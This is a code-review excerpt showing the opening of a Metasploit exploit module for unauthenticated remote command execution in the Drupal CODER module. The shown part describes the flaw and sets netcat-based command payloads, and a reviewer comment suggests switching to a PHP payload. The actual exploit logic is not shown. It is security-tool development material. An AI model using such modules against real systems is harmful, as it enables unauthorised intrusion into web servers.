modules/exploits/unix/webapp/drupal_coder_exec.rb

```diff
@@ -0,0 +1,107 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Drupal CODER Module Remote Command Execution',
+      'Description'    => %q{
+        This module exploits a Remote Command Execution vulnerability in
+        Drupal CODER Module. Unauthenticated users can execute arbitrary command
+        under the context of the web server user.
+
+        CODER module doesn't sufficiently validate user inputs in a script file
+        that has the php extension. A malicious unauthenticated user can make
+        requests directly to this file to execute arbitrary command.
+        The module does not need to be enabled for this to be exploited
+
+        This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Nicky Bloor',                         # discovery
+          'Mehmet Ince <mehmet@mehmetince.net>'  # msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.drupal.org/node/2765575']
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'       => 225,
+          'DisableNops' => true,
+          'BadChars'    => "\x00\x2f",
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'netcat netcat-e'
+            },
+        },
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
```

Comment:
Is there a way you can convert this to ```ARCH_PHP```, since you're using serialized code below? Otherwise, you should be able to use ```php -r```.